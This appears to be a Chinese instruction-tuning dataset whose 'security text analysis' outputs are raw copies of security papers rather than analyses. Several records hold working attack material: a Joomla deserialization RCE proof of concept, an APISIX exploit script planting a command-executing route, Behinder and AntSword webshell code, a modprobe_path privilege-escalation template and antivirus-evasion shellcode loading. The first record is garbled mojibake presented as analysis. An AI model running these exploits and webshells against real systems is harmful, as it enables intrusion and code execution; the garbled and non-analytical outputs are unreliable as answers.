{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n\"!#%$'&)(* !+-,.$/(0$/21 3452,.16)78!#%$'&9(:<;#(- =?>@$/(01A 1@BC>D- 1A3\"FE?* GIHKJ%LNM=OQPQRSUTVRXWZYU[\\PI]_`[a[\\JUb`cdRXecfS:ghRfiFOQekjkHXPQJ*RX lRm`imRXne#oVJUOpiX[anb`Opc.L qsrXtvuxwyrUz{\\r}|Z~QXdZ*u'mzZZ Z|Z~'X}w2rX}z* Z|syrXt}rXn%n} j8RfLsS:mKK U`Z  0m`'Vª\\V a`'\\.Vª ²kª0`³nµ³}v'²N¹ªºa '`¼_/\\a'F½U²`¼'¾ZZ'?v½'5ZFIÀIf9'Áv½\\5 ³m\\v ª ²/'² ª³=nºª %¼¾ZZ'v½\\5Z'\\V\\  `Â}2'5 m 5'/ ½\\I¼'¾d\\/\\0ÃÄÁÂvÅ}'¼'¾Z\\/V¼XÅ/`I\\Æ\\}Å _ mº\\/mÂVªºdvº=ª ²ÅDz'`\\ '`È`}½U¼'¾Z\\/¼XÊÉ n05d½yK'9³X)/ËK`/¾-ÆmÅUÀI n}Ê ½s²n-²'Æ\\`µ ª}ÅÂvkÌm\\/ª Ê'²`Æmµ ÍΪ ²'h/\\}}9`'9²}d¾\\ 5\\I½:Âv'}ÆVª ²/'²Á9`/Ç ²}I¼'¾Z\\/nÏ\\}'an Ð *vÂv`/Ñv¼Å}U¼'`Â')/\\}/`Ƽ'¾Z?¼Xn:}¼'ÊÉ ¾ZÎ``=ÃÎ`}ÂC³fÄÂ'/}'Æ_v/5}'³ÒÎÓ²}fÁ³X½ ª³=n²}I`s/m`v½\\5Z'\\ Ô ÕÖ9UØ*ÙÚ_Û=ÜUÝÙÖ Þ0ßZàvásâßVãvßä%ßZå`ævââçCßèméFæfê.ßßdëìdàí_í_ßZåìdßîïê/ðÓñKïàâæfê/ïàäò?àvó ê/ð%ßïåÁáUßZåò/àäævâ*áå/àváë ßZå/êçvô=õ?ð%ßZçæfå/ßhìdàäìdßZåä%ßöê/ðæfê5øsé%çXïyä%ãùàäâyïä%ßVîïââ0å/ßò/éâêïäéämîævämê.ßöò.áFæví ßí_ævïâxúXê/ð%ßïå áßZå`ò.àäævâFïyä%ópàvå`í_æfê/ïàähøUßïä%ãò.àâöÎê.àí_æfåûvßZê/ïä%ãVàvåãæväïüæfê/ïàäò)æväö áàòò/ïøFâçVßZñvßäùê/ð%ßïåIïö%ßämê/ïêçàvå ìdåßöïêIìZæfåöÎïä%óQàvåí_æfê/ïàähò/ê.àâßä*ô ý?ßìdßämê ò/éå/ñvßZç öæfê/æNïäöïyìZæfê.ßö#ê/ðæfê_þvÿ àvó9ìdàäò/éíhßZå`òæfå/ßÓìdàäìdßZå`ä%ßöæføUàé%êê/ðßCíùïò/éò.ßÎàvó ê/ð%ßïåVáUßZåò/àäævâïä%óQàvåí_æfê/ïàäàäâïä%ßvúæväöáå`ïñaævìdçNìdàäìdßZå`äòVæfå/ßÎê/ð%ßùäXéíøßZå àä%ßåßævò.àäùîð}ç_ïäFöïñKïöéævâòìðàmàò.ßê.à=ò.ê/æçùà ê/ð%ß Çämê.ßZåä%ßZê þ Òô9ê/ðßZåò òïíháFâç ö%ßìZïö%ßCê/ðæfê_âàòòàvóáåïñfævìdç#ïòhæväïyä%ßZñXïê/æføFâßÎìdàäFò.ßèméßäìdßÓàvóö%àïyä%ã+øséò/ïä%ßòò ê/ð%ßò.ß+öFæçKòZô 'óî ß¹øUßâïßZñvßÓê/ðæfêùáUßZàváFâßÓñfævâé%ßÓáFåïñfævìdçvú îÁðmçïòhê/ð%ßZåß ä%àvêùævä ßÎìZïßämê í_æfå/ûvßZêóQàvå ïê¹õ?ðïòïyò ê/ð%ßèXé%ßò.ê/ïàä_ê/ðæfê ê/ðïòásæfáßZå ò.ßZßZûXò ê.à=ævöö%å/ßò/òô   à%úKîÁðæfê-ïò ê/ð%ßò.ê/æfê.ß5àvó2áå`ïñaævìdçhàäÄê/ð%ß5ïämê.ßZåä%ßZêZúKæväöCð%à\\î ðFævòïê ßZñvàâñvßö 'äàvåößZå9ê.à¹æväFò.î ßZå5ê/ðFïòèmé%ßò/ê/ïàä*ú*îß_ä%ßZßöNæCö%ßsäïê/ïàä àvó îÁðæfêïêíhßæväòê.à áå/àvê.ßìdêVáFåïñfævìdçvô%àvåê/ð%ß_áFéå/áUàò.ßòàvó)ê/ðïò5áFæfáUßZåú2î ßÎîÁïââºö%ßsäßhê/ð", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Joomla 3.4.5 反序列化漏洞CVE-2015-8562 Joomla是一个开源免费的内容管理系统CMS基于PHP开发 本漏洞根源是PHP5.6.13前的版本在读取存储好的session时如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据而Joomla将session存储在Mysql数据库中编码是utf8当我们插入4字节的utf8数据时则会导致截断截断后的数据在反序列化时就会失败最后触发反序列化漏洞 通过Joomla中的Gadget可造成任意代码执行的结果 详情可参考 - https://www.leavesongs.com/PENETRATION/joomla-unserialize-code-execute-vulnerability.html 影响版本 - Joomla 1.5.x, 2.x, and 3.x before 3.4.6 - PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45 ## 测试环境 启动测试环境 ``` docker compose up -d ``` 启动后访问`http://your-ip:8080/`即可看到Joomla的首页包含测试数据 ## 漏洞复现 然后我们不带User-Agent头先访问一次目标主页记下服务端返回的Cookie ![](2.png) 再用如下脚本生成POC[在线运行](https://onlinephp.io/c/e824b) ```php <?php class JSimplepieFactory { } class JDatabaseDriverMysql { } class SimplePie { var $sanitize; var $cache; var $cache_name_function; var $javascript; var $feed_url; function __construct() { $this->feed_url = \"phpinfo();JFactory::getConfig();exit;\"; $this->javascript = 9999; $this->cache_name_function = \"assert\"; $this->sanitize = new JDatabaseDriverMysql(); $this->cache = true; } } class JDatabaseDriverMysqli { protected $a; protected $disconnectHandlers; protected $connection; function __construct() { $this->a = new JSimplepieFactory(); $x = new SimplePie(); $this->connection = 1; $this->disconnectHandlers = [ [$x, \"init\"], ]; } } $a = new JDatabaseDriverMysqli(); $poc = serialize($a); $poc = str_replace(\"\\x00*\\x00\", '\\\\0\\\\0\\\\0', $poc); echo \"123}__test|{$poc}\\xF0\\x9D\\x8C\\x86\"; ``` ![](1.png) 将生成好的POC作为User-Agent带上第一步获取的Cookie发包这一次发包脏数据进入Mysql数据库然后同样的包再发一次我们的代码被执行 ![](3.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前5个加密字符还原, 请看龙哥的文章 SO逆向入门实战教程九blackbox https://blog.csdn.net/qq_38851536/article/details/118115569 打开ida, 从sub_3B3C方法继续向下分析 我们一步一步看: 首先是v19的赋值 1 uint8x8_t v19; // d16 2 v19.n64_u32[1] = *(_DWORD *)\"6789BCDFGHJKRTVWMNPQ567\"; 3 uint8x8_t 的结构体如下: 这里用到了 ARM NEON 编程 https://www.cnblogs.com/xylc/p/5410517.html DCD 4个字节 DCW 2个字节 DCB 1个字节 DCQ 8个字节 1 // v35就是前5个加密字节 2 v19.n64_u32[0] = *(_DWORD *)&v35[1]; 这一步将上面得到的后4个字节的加密值赋值给 n64_u32[0] 就是上边的CD2D 1 uint32x4_t v34; // [sp+20h] [bp168h] BYREF 2 //寄存器中的每个元素的长度都扩展为原来的两倍u8扩展为u16 3 v34 = vmovl_u16((uint16x4_t)vmovl_u8(v19).n128_u64[0]); 分为以下4步: 1) vmovl_u8对读取的uint8x8进行宽度扩展 vmovl_u8() 将uint8x8_t --> uint16x8_t 这句的作用是 //convert to 16-bit and move to 128-bit reg CD2D 由原来的每个字符一个字节, 变成一个字符2个字节, 高位补0 2) 然后取前n128_u64[0], 即取前64位数据 3) 然后 使用(uint16x4_t) 强转成 uint16x4_t 类型 这句的作用是 //get low 64 bit and move them to 64-bit reg 4) 最后 vmovl_u16 对读取的uint16x4进行宽度扩展 vmovl_u16() 将uint16x4_t --> uint32x4_t CD2D 由原来的每个字符2个字节, 变成一个字符4个字节, 高位补0 然后将拓展后的数据传入 sub_194C() 方法 在unidbg debugger 传到sub_194C方法是这样的 分析 sub_194C() 看上去调用了很多方法, 其实也没有什么 直接用java还原即可 下面放出代码: 1 public static int[] sub_194C(int[] a1) { 2 int v1; 3 int v3; 4 int v4; 5 int v5; 6 int v6; 7 int v7; 8 int v8; 9 int v9; 10 int v18; 11 int v23; 12 int v24; 13 int v22; 14 int v21; 15 int v20; 16 int v19; 17 int v10; 18 int v11; 19 int v12; 20 int v13; 21 int v14; 22 int v15; 23 int v16; 24 25 26 v1 = a1[0]; 27 v3 = sub_191E(v1); 28 v4 = a1[1]; 29 v24 = v3; 30 v5 = (2 * v4)  0x1B; 31 if ( (v4 & 0x80) == 0 ){ 32 v5 = 2 * v4; 33 } 34 v18 = v5  v4; 35 v23 = sub_18F8(v4); 36 v6 = a1[2]; 37 v22 = sub_18D4(v6); 38 v7 = a1[3]; 39 v21 = sub_191E(v4); 40 v20 = sub_18F8(v6); 41 v19 = sub_18D4(v7); 42 v8 = v18  sub_18D4(v1); 43 v9 = v8  sub_191E(v6); 44 v10 = v9  sub_18F8(v7); 45 v11 = sub_18F8(v1); 46 v12 = sub_18D4(v4); 47 v13 = sub_191E(v7); 48 a1[2] = v10 & 0xff; 49 v14 = (2 * v1)  0x1B; 50 if ( (v1 & 0x80) == 0 ){ 51 v14 = 2 * v1; 52 } 53 a1[1] = (v14  v1  v21  v20  v19) & 0xff; 54 v15 = (2 * v7)  0x1B; 55 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-behinder源码学习 PHP类型 入口 net.rebeyond.behinder.ui.controller.MainController.java openshell() 打开一个shell会创建一个新的线程去管理这个shell下一步是进入到新的线程当 中 mainWindowController net.rebeyond.behinder.ui.controller.MainWindowController.java 这里就是获取一个正常shell的连接重要的是执行这个 this.doConnect() 方法而这个方法最 后指向的是 this.currentShellService.doConnect() 继续跟进 net.rebeyond.behinder.core.shellService.java 这里需要关注两个地方就是一些变量表示的含义之后会频繁用到第二个就是这个 this.echo(content) 方法此处会根据我们shell类型的不同进入不同的连接处理逻辑此处以 PHP 为例就首先进入到 this.currentType.equals('php') 首先是生成一个随机字符串 content 然后进入 this.echo() 方法 net.rebeyond.behinder.core.shellService.java#echo 此处的两个关键方法是 Utils.getData() 和 Utils.requestAndParse() 其中这个 getData 是 用于处理功能模板的继续跟踪深入注意传递的参数 net.rebeyond.behinder.utils.Utils.java#getData 最后这个函数来到了 net.rebeyond.behinder.utils.Utils.java#getData 此处还是先看一 下传递的参数然后就是根据不同的shell类型选择处理逻辑此处还是首先选择 php 此处首 先是传递的 className=echo  然后调用 ParamgetParamedPhp 方法去获取参数列表 net.rebeyond.behinder.core.Params.java#getParamedPhp 此处有一个路径寻找的过程这个路径是事先规定好的根据我们传递的 className=echo 去 找到 Echo.php 这个文件然后将文件读取放入缓冲区 StringBuilder 里面然后调用 getPhpParams() 方法 net.rebeyond.behinder.core.Params.java#getPhpParames 这个 getPhpParams 方法是真正用来获取参数列表通过正则表达式之后返回 Echo.php 这个文 件中 main 函数的参数列表 函数返回继续执行 getParamedPhp 此处是根据参数列表来为参数赋值所有的值都是经过 base64 编码的最后可以看到 Echo.php 的内容变成了上面这样最后返回字节码 程序返回到 getData 方法继续执行后面的逻辑 将 Echo.php 的内容 Base64 编码然后和字符串拼接之后获取字节码然后再进行 AES 加密处 理其中使用的 iv 向量全 0 将加密内容再进行编码然后返回 net.rebeyond.behinder.core.shellService.java#echo net.rebeyond.behinder.core.shellService.java#echo->requestAndParse() 这个方法是用用于发送请求的然后将响应分装到 map 当中并且返回 data 是响应数据 header 是响应头信息 请求流量与shell执行过程 首先查看webshell的内容 Echo.php <?php @error_reporting(0); session_start(); $key=\"e45e329feb5d925b\"; //该密钥为连接密码32位md5值的前16位默认连接密码rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents(\"php://input\"); if(!extension_loaded('openssl')) { $t=\"base64_\".\"decode\"; $post=$t($post.\"\"); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]$key[$i+1&15]; } } else { $post=openssl_decrypt($post, \"AES128\", $key); } $", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前言 By:Astartes 杀软对抗貌似是个经久不衰的议题在我看来他是红队必备的基础设施之一在红队中不可缺少我想 用这篇文章尽量用大白话的形式来说一下 \"静\",\"动\"这篇文章很基础因为到头来我只讲了如何上 线同时这篇文章又与别的文章不太一样我想从比较基础的东西让初学者知道到底该如何对抗 静态免杀 首先我们先看下面这段代码,定义了两个数组 这两个数组的不同之处在于 1. 类型不同 Characterarr为字符数组String为字符串字符串在后面默认填\\0 1. 存放区域不同 字符数组或者小数组存放的位置在栈里而字符串是常量在常量区 请一定要注意这两种的格式字符串由双引号包裹字符数组由单引号包裹 在汇编里如下 int main() { char Characterarr[] = { '1','2','3','4','5','6' }; char String[] = { \"123456\" }; return 0; } char Characterarr[] = { '1','2','3','4','5','6' }; 009E512F mov byte ptr [Characterarr],31h 009E5133 mov byte ptr [ebp-0Fh],32h 009E5137 mov byte ptr [ebp-0Eh],33h 009E513B mov byte ptr [ebp-0Dh],34h 009E513F mov byte ptr [ebp-0Ch],35h 009E5143 mov byte ptr [ebp-0Bh],36h char String[] = { \"123456\" }; 009E5147 mov eax,dword ptr [string \"123456\" (09E7B30h)] 009E514C mov dword ptr [String],eax 009E514F mov cx,word ptr ds:[9E7B34h] 009E5156 mov word ptr [ebp-1Ch],cx 在汇编代码里我们可以更清晰的看到 char Characterarr[] = { '1','2','3','4','5','6' }; 是通过mov 把数组里 的值放入了 ebp- 的位置ebp是栈寄存器 char String[] = { \"123456\" }; String确是由09E7B30h这个地址里的值传给eax的 这里的知识其实是C语言的内存四区以及PE结构的知识如果你不懂那没关系 看我下面的操作 我们 可以重新生成一下第一个C语言程序并且把那两个数组改成下面的 更改的代码如下 在编译好后用十六进制编辑器打开这个exe接着去搜索这两个字符数组 看下图我只找到了 String的123456123456123456 同时静态查杀的原因既是如此如果病毒的特征库里存在123456123456123456这个字符串存在这个 字符串那他被扫描的时候就可以判断为病毒文件了通过查找在磁盘中的文件的特征码这些特征码由 病毒库通过大量分析得出来进行查杀 大家伙儿用的最多的cobaltstrike的shellcode他生成的payload也是以字符串的形式同样它也保存 在常量区 009E515A mov dl,byte ptr ds:[9E7B36h] 009E5160 mov byte ptr [ebp-1Ah],dl int main() { char Characterarr[] = { '1','2','3','4','5','6' }; char String[] = { \"123456123456123456\" }; return 0; } 目前大家用到的最多的方式是对shellcode这个字符串加密加密过后虽然他依然在常量区但是已经 不在杀软的特征库里了 你也可以把他放入到栈里这里有一个问题是当你的字符数组里的值太多的时 候或者 选择Release时会给你放到常量区这是因为编译器会进行优化 这是我没有进行处理的时候通过cobaltstrike默认提供的字符串的形式去加载的火绒直接识别出了特 征 下面的代码是我用来实现栈中存放数据的 #include <windows.h> #include <iostream> #include <stdio.h> #include <string.h> #include <stdlib.h> char* buf1() { char buf[] = { '\\xfc','\\xe8','\\x89','\\x00','\\x00'}; //CS的shellcode太长这里是 实例 char* charbuf = new char[799]; memcpy(charbuf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### PWN关于Change Others概述 如果我们可以改变特权进程的执行轨迹也可以实现提权这里我们从以下角度来考虑如何改变特权进程的执行轨迹 - 改数据 - 改代码 ### Change Others基于改数据的方法介绍之符号链接 如果一个 root 权限的进程会执行一个符号链接的程序并且该符号链接或者符号链接指向的程序可以由攻击者控制攻击者就可以实现提权 ### Change Others基于改数据的方法介绍之call_usermodehelper `call_usermodehelper` 是一种内核线程执行用户态应用的方式并且启动的进程具有 root 权限因此如果我们能够控制具体要执行的应用那就可以实现提权在内核中`call_usermodehelper` 具体要执行的应用往往是由某个变量指定的因此我们只需要想办法修改掉这个变量即可不难看出这是一种典型的数据流攻击方法一般常用的主要有以下几种方式 ### call_usermodehelper方法基于修改 modprobe_path的介绍 修改 modprobe_path 实现提权的基本流程如下 1. 获取 modprobe_path 的地址 2. 修改 modprobe_path 为指定的程序 3. 触发执行 `call_modprobe `从而实现提权 这里我们可以利用以下几种方式来触发 1. 执行一个非法的可执行文件非法的可执行文件需要满足相应的要求参考 call_usermodehelper 部分的介绍 2. 使用未知协议来触发 这里我们也给出使用 modprobe_path 的模板 ```c // step 1. modify modprobe_path to the target value // step 2. create related file system(\"echo -ne '#!/bin/sh\\n/bin/cp /flag /home/pwn/flag\\n/bin/chmod 777 /home/pwn/flag\\ncat flag' > /home/pwn/catflag.sh\"); system(\"chmod +x /home/pwn/catflag.sh\"); // step 3. trigger it using unknown executable system(\"echo -ne '\\\\xff\\\\xff\\\\xff\\\\xff' > /home/pwn/dummy\"); system(\"chmod +x /home/pwn/dummy\"); system(\"/home/pwn/dummy\"); // step 3. trigger it using unknown protocol socket(AF_INET,SOCK_STREAM,132); ``` 在这个过程中我们着重关注下如何定位 modprobe_path ##### 直接定位 由于 modprobe_path 的取值是确定的所以我们可以直接扫描内存寻找对应的字符串这需要我们具有扫描内存的能力 ##### 间接定位 考虑到 modprobe_path 相对于内核基地址的偏移是固定的我们可以先获取到内核的基地址然后根据相对偏移来得到 modprobe_path 的地址 ### call_usermodehelper方法基于修改 poweroff_cmd的介绍 1. 修改 poweroff_cmd 为指定的程序 2. 劫持控制流执行 `__orderly_poweroff` 关于如何定位 poweroff_cmd我们可以采用类似于定位 `modprobe_path` 的方法 ### Change Others基于改代码的方法之修改 vDSO 代码 内核中 vDSO 的代码会被映射到所有的用户态进程中如果有一个高特权的进程会周期性地调用 vDSO 中的函数那我们可以考虑把 vDSO 中相应的函数修改为特定的 shellcode当高权限的进程执行相应的代码时我们就可以进行提权 在早期的时候Linux 中的 vDSO 是可写的考虑到这样的风险Kees Cook 提出引入 `post-init read-only` 的数据即将那些初始化后不再被写的数据标记为只读来防御这样的利用 在引入之前vDSO 对应的 raw_data 只是标记了对齐属性 ```c fprintf(outfile, \"/* AUTOMATICALLY GENERATED -- DO NOT EDIT */\\n\\n\"); fprintf(outfile, \"#include <linux/linkage.h>\\n\"); fprintf(outfile, \"#include <asm/page_types.h>\\n", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHE ROAD LESS SURREPTITIOUSLY TRAVELED @pukingmonkey DEF CON 21 THE LOSS OF LOCATIONAL PRIVACY WHILE TRAVELING IN YOUR AUTOMOBILE  Automatic License Plate Readers (ALPRs)  Snitch devices in your car  Transponder based Electronic Toll Collection (ETC)  GPS  Smart phones traffic apps  Dumb phones  Automatic tire pressure monitors DO YOU HAVE THE RIGHT TO TRAVEL? Interstate: YES. Saenz v. Roe (1999) the right to travel that is guaranteed by the Privileges or Immunities Clause of the Fourteenth Amendment. Intrastate: YES. But not as clear, it's usually derived from First Amendment freedom of association and Fifth Amendment due process protection. International: YES. Kent v. Dulles (1958) The right to travel is a part of the \"liberty\" of which a citizen cannot be deprived without due process of law under the Fifth Amendment. DO YOU HAVE THE RIGHT TO DRIVE? NO It is a privilege, not a right, that is regulated, must be granted (licensed) and can be revoked, according to the prevailing laws of every jurisdiction of the United States. DO YOU HAVE THE RIGHT TO ANONYMOUS TRAVEL? Mostly YES but it depends on your mode of travel, in the U.S. you are not required to carry ID except:  when driving, it requires licensing NO  taking a commercial flight NO  crossing a national border NO AUTOMATIC LICENSE PLATE READERS A system of cameras, computers and GPS that reads the license plates (OCR), and notes coordinates and time, they can be mobile or fixed locations. Can do about 3,000 plates/hour, on moving vehicles up to 130MPH. All data is saved and downloaded to a central repository. WHATS THE BIG DEAL? Police have been running plates forever  Captures all plates in its field of vision  retained in databases along with pictures from 21 days to 5 years (depends on jurisdiction)  Enough APLRs and data points = tracked NYC: 108 fixed and 130 mobile APLRs as of 2009  Impossible to opt-out IS IT LEGAL TO DO THIS WARRENTLESS TRACKING? YES  Hester v. United States (1924) An observation made ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python3 import zlib import json import random import requests import string import sys from urllib3.exceptions import InsecureRequestWarning # Suppress only the single warning from urllib3 needed. requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) eval_config = { \"Counsumers\": [], \"Routes\": [ { \"id\": str(random.randint(100000000000000000, 1000000000000000000)), \"create_time\": 1640674554, \"update_time\": 1640677637, \"uris\": [ \"/rce\" ], \"name\": \"rce\", \"methods\": [ \"GET\", \"POST\", \"PUT\", \"DELETE\", \"PATCH\", \"HEAD\", \"OPTIONS\", \"CONNECT\", \"TRACE\" ], \"script\": \"local file = io.popen(ngx.req.get_headers()['cmd'],'r') \\n local output = file:read('*all') \\n file:close() \\n ngx.say(output)\", \"status\": 1 } ], \"Services\": [], \"SSLs\": [], \"Upstreams\": [], \"Scripts\": [], \"GlobalPlugins\": [], \"PluginConfigs\": [] } def random_str(): return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) def calc_crc(data): crc32 = zlib.crc32(data) & 0xffffffff return crc32.to_bytes(4, byteorder=\"big\") def export_data(url): r = requests.get(url + \"/apisix/admin/migrate/export\", verify=False) return r.text[:-4] def import_data(url, data): data = json.dumps(data).encode() crc32 = calc_crc(data) files = {\"file\": (\"data\", data + crc32, \"text/data\")} resp = requests.post(url + \"/apisix/admin/migrate/import\", files=files, verify=False) # print(resp.text) if resp.json().get(\"code\", -1) == 0: return True else: return False if __name__ == \"__main__\": if len(sys.argv) != 2: print(\"python \" + sys.argv[0] + \" http://127.0.0.1:9000\") exit() url = sys.argv[1] if url.endswith(\"/\"): url = url[:-1] uri = random_str() eval_config[\"Routes\"][0][\"uris\"] = [ \"/\" + uri] eval_config[\"Routes\"][0][\"name\"] = uri if import_data(url, eval_config): print(\"attack success\") print(\"uri is: \" + \"/\" + uri) else: print(\"attack error\")", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNext Generation Collaborative Reversing with Ida Pro and CollabREate Chris Eagle and Tim Vidas Naval Postgraduate School Shameless Plug Coming soon to finer book stores Defcon 16 CollabREate 3 Prepare for Demo Defcon demo package Compiled plugins Plugin source Binary for everyone to analyze http://www.idabook.com/defcon Defcon 16 CollabREate 4 Why? Because Chris can't spell Desire for multiple people to collaborate on a project and synchronize their RE efforts. Sharing IDBs is problematic, slow, and doesn't allow for merging changes People that want to collaborate have different versions of IDA Ida Sync was a great start but kinda busted, and it didn't do enough anyway Goals Automatically sync up to current idb state when connecting Allow multiple projects and provide some safety for connecting to the correct one Allow users to enter/exit collaboration at will Allow forking of projects when participants decide to try different things Allow some granularity on what actions each participant is allowed to perform (global/project) Defcon 16 CollabREate 6 Basic Idea Hook as many IDA actions(events) as possible Example: on \"create comment\" send a datagram to the server Server Mirrors the datagram to all other interested IDA sessions Caches the datagram for anyone not currently connected Asynchronous Comms Asynchronous comms/events not easy IDA is single threaded Don't start a second thread that interacts with the database! Windows asynchronous sockets post messages to an application's message queue Handled in the GUI event loop IDA Sync and IdaRub use this technique Improved robustness to handle partial sends/receives Complete separation of comms and GUI. Ida'isms There is no pre-action hook (yet)* Sometimes nice to know state before the change takes place Some events don't give you enough information (structure rename/delete) Can't tell what old name was Resulted in some IDA kernel / SDK patches Found one bug in notification API Requested and received one change in notif", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n-webshell self-xssxss A 0x01 http/https nodejsgoby js rcegobywebshell 1. jb 2. shell.php 3. jb 4. jb 5. jbwebshell 6. 7. JSRCE OKwebshelljbrcewebshell webshell 1. post 2. 3. 4.  5. 0x02 111webshell 111=@ini_set(\"display_errors\", \"0\"); @set_time_limit(0); $opdir=@ini_get(\"open_basedir\"); if($opdir) { $oparr=preg_split(\"/\\\\\\\\|\\//\",$opdir); $ocwd=dirname($_SERVER[\"SCRIPT_FILENAME\"]); $tmdir=\".cc06e1b50e\"; @mkdir($tmdir); @chdir($tmdir); @ini_set(\"open_basedir\",\"..\"); for ($i=0;$i<sizeof($oparr);$i++) { @chdir(\"..\"); } @ini_set(\"open_basedir\",\"/\"); @rmdir($ocwd.\"/\".$tmdir); } ; function asenc($out) { return $out; } ; function asoutput() { $output=ob_get_contents(); ob_end_clean(); echo \"c63f\".\"aa80\"; // echo @asenc($output); echo \"03b\".\"b509\"; // } ob_start(); try { $D=dirname($_SERVER[\"SCRIPT_FILENAME\"]); if($D==\"\")$D=dirname($_SERVER[\"PATH_TRANSLATED\"]); $R=\"{$D} \"; if(substr($D,0,1)!=\"/\") { foreach(range(\"C\",\"Z\")as $L)if(is_dir(\"{$L}:\"))$R.=\"{$L}:\"; } else { $R.=\"/\"; } $R.=\" \"; $u=(function_exists(\"posix_getegid\"))?@posix_getpwuid(@posix_geteuid()):\"\"; $s=($u)?$u[\"name\"]:@get_current_user(); $R.=php_uname(); $R.=\" {$s}\"; echo $R; ; } catch(Exception $e) { echo \"ERROR://\".$e->getMessage(); } ; asoutput(); die(); c63faa80D:/phpstudy_pro/WWW C:D:E:F: Windows NT LAPTOP-465G 6.2 build 9200 (Windows 8 Business Edition) i586 USER 03bb509 webshellweb webshell \\t $ze=\"%echo \\\"([<]*?).\\\"([<]*?)\\\";%si\"; preg_match($ze,$A,$B); $c=\"$B[0]\"; // echo \"xxxx\".\"xxxx\"; $key= str_replace(['\"', '.', 'echo', ' ', \";\"], \"\", $c); //xxxxxxxx $txt='D:/phpstudy_pro/WWW'.\"\\t\".'C:D:E:F:'.\"\\t\".'Windows NT LAPTOP-46FFII5G 6.2 build 9200 (Windows 8 Business Editi on) i586'.\"\\t\".'administrator'; echo \"$key\".\"$txt\";// $ret=127; ++ $ze=\"%echo \\\"([<]*?).\\\"([<]*?)\\\";%si\"; preg_match($ze,$A,$B); $c=\"$B[0]\"; $key= str_replace(['\"', '.', 'echo', ' ', \";\"], \"\", $c); $payload='http://exp.com/index.html';//js echo \"$key\".'ret=405'.\"\\n\".'AntSword'.\"$payload\";// 0x03 demo webshell.php <?php <?php $A=urldecode(fi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n________________________________________________________________________ 14 March 2008 Comparison of File Infection on the Windows and Linux Disclaimer: The author of this document is not responsible of any kind of damage that could be made with the bad use of this information. The objective of this paper is for educational and research purposes only. It is made for use in viruses, but not as to promote any intentional harm or damage on computer systems. Author: lclee_vx lclee_vx@yahoo.com 1.0 Foreword / Introduction This paper documents the common file infection strategies that virus writers have used over the years, conduct the comparison of Portable Executable (PE) file infection on the Windows platform and Executable and Linking Format (ELF) file infection on the Linux platform. So, lets set the goal: I will go through the file format of PE and ELF, demonstration, source code, examples included along with the introduction of simple file infection method on Windows and Linux. Here are the two ways (file infection) I will present here: 1. Appending to the PE file with adding a new section  Windows Platform 2. Writes parasite code at entry point and the original data will be stored at end of file  Linux Platform Note: This article is never perfect, so notify me the possible mistakes in this document for further updates. Contact me: Email : lclee_vx@yahoo.com Group : F-13 Labs Personal Web Site : http://www.f13-labs.net 2.0 Useful Things for Coding You need some tools/references before start code the virus on the Linux/Windows platform. As below: Windows: 1. The tasm 5.0 package  Win32 Assembly Language compiler 2. The API list (Win32 API help file) 3. PE file format  Strongly recommended Matt Pietrek document 4. Basic knowledge on Win32 Assembly Language 5. Assembly IDE  RadASM version 2.2.0.2 6. Debugger  OllyDbg version 1.10 7. Platform  Windows XP Linux: 1. Nasm (Netwide Assembler) version 0.98.39  Assembly Language Compiler (Linux) Comparison File Infection on ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDont Fuck It Up! Zoz jackdawsart.com Unjust laws exist: shall we be content to obey them, or shall we endeavor to amend them, and obey them until we have succeeded, or shall we transgress them at once? Henry David Thoreau, Civil Disobedience FUCK IT UP  Tradecraft Perceptual Biases Expectations Resistance Ambiguities Biases In Evaluating Evidence Consistency Missing Information Discredited Evidence Biases In Estimating Probabilities Availability Anchoring Overconfidence Biases In Perceiving Causality Rationality Attribution Tradecraft  Key Assumptions Check  Quality Of Information Check  Contrarian Techniques  Devils Advocacy  High Impact/Low Probability  What If? Analysis  Red Team OPSEC Identify Critical Info Analyze Threats Assess the Risks Apply Countermeasures Analyze Vulnerabilities The 7 Deadly Fuckups  Overconfidence  Trust  Perceived Insignificance  Guilt By Association  Packet Origin  Cleartext  Documentation Dont Fuck It Up When You Use A VPN  Traffic Encryption  Location Obfuscation  Request Concealment  ...Depending On Listener Location  ...Depending On Provider  Remember: PPTP Broken As Of Dont Fuck It Up When You Use Case Study: LulzSec/AntiSec  Dont Fail Unsafe With Tor  Always Check What Youre Exposing  OPSEC Is 24/7 Moral: Case Study: Harvard Bomb Hoax What Fucked It Up?  Harvard Network Registration  Outgoing Traffic Logs  Pervasive Surveillance Microcosm  Moral:  Key Assumptions Check  High Impact/Low Probability Analysis  Bridge Relays  Traffic Analysis Preparation Case Study: Silk Road/DPR What Fucked It Up? ? ale. able ices etely t of rrent dden elays crip- Figure 4. Hidden service descriptor request rate during one day. its usage statistics. As a proof of concept we used this approach to control one of the six hidden service directories of the discovered Tor botnet, the Silk Road hidden service, and the Duck- DuckGo hidden service. We tracked these for 